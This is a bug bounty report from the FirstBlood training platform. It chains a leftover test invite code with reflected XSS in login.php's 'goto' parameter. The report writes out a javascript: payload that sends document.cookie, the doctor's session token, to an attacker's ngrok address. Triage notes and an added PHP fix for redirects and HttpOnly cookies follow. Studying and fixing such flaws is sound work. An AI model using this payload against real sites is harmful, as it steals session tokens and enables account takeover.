FirstBlood-#613 — [COLLAB] Can register as a doctor and steal token upon login.
This issue was discovered on FirstBlood v2
On 2021-10-26, amec0e Level 3 reported:
Hey mate,
I found that on the register.php endpoint we can register as a new doctor using an inviteCode with the value test. After registering as a new doctor and then clicking on a link to the login page from a malicious user, upon the doctor logging in via the endpoint login.php they will be sent to our ngrok address where we can steal their drps= token via the parameter goto on the login endpoint.
Impact:
A user can register as a doctor using the inviteCode=test; then, following a link from a malicious user, we can steal the doctor's drps= token because of the lack of an httponly flag on the drps cookie.
Steps to Reproduce:
- Visit the endpoint register.php
- Enter a username and in the invite code use test
- Click register and you will now be given credentials.
Request:
Response:
- Click "Continue to login"
- Start our Ngrok server.
- Append the following parameter to the login URL:
?goto=javascript:window.location.href=`YOURNGROKADDRESS/${document.cookie}`
- Replace your ngrok address in the payload and press "Enter"
- Now log in with your new credentials and you will be redirected to your ngrok address.
NOTE: You will receive an error and maybe a 404; this is normal.
You will now see the token has been leaked to our ngrok address.
Remediation:
Update filtering to protect against javascript URI redirection.
Best regards,
Amec0e.
In Collaboration with thebinarybot
P2 High
This report contains multiple vulnerabilities:
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should have been "fixed" when redirecting to prevent XSS, but due to an oversight from Sean and Karl, the new code did not make it into production. This has since been updated since the event ended and you're recommended to re-try. It's related to bug ID 26 because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.
FirstBlood ID: 24
Vulnerability Type: Auth issues
The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.
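The remediation in the report ("filter javascript URI redirection") and the missing httponly flag can both be addressed server-side. The following is an added example, not FirstBlood's own code; the helper names safe_redirect_target() and issue_session_cookie() and the default landing path are assumptions, while the parameter name goto and cookie name drps come from the report.

```php
<?php
// Added example (not FirstBlood code). Only a same-site, slash-rooted path is
// ever accepted as a redirect target; everything else falls back to $default.
function safe_redirect_target(?string $goto, string $default = '/home.php'): string
{
    if ($goto === null || $goto === '') {
        return $default;
    }
    // Drop control characters and whitespace, which browsers ignore when
    // parsing a scheme, so that an obfuscated scheme cannot slip past the check.
    $candidate = preg_replace('/[\x00-\x20\x7f]/', '', $goto);
    if ($candidate === null || $candidate === '') {
        return $default;
    }
    // Reject any URL with a scheme (javascript:, data:, http:, https:, ...)
    // and protocol-relative URLs (//host), both of which leave the application.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate) === 1
        || substr($candidate, 0, 2) === '//') {
        return $default;
    }
    // Some browsers treat backslashes as forward slashes, so "/\host" would
    // also become protocol-relative; reject them outright.
    if (strpos($candidate, '\\') !== false) {
        return $default;
    }
    // Must be rooted inside the application, e.g. "/dashboard.php".
    if ($candidate[0] !== '/') {
        return $default;
    }
    return $candidate;
}

// Issue the session cookie with HttpOnly so document.cookie cannot read it,
// which removes the token-theft half of the report even if a reflection remains.
function issue_session_cookie(string $token): void
{
    setcookie('drps', $token, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Assumed use in login.php after a successful login:
//   issue_session_cookie($token);
//   header('Location: ' . safe_redirect_target($_GET['goto'] ?? null));
//   exit;
```

With this in place a goto value of "javascript:..." or "//attacker-host" yields the default page, while "/dashboard.php" is passed through unchanged.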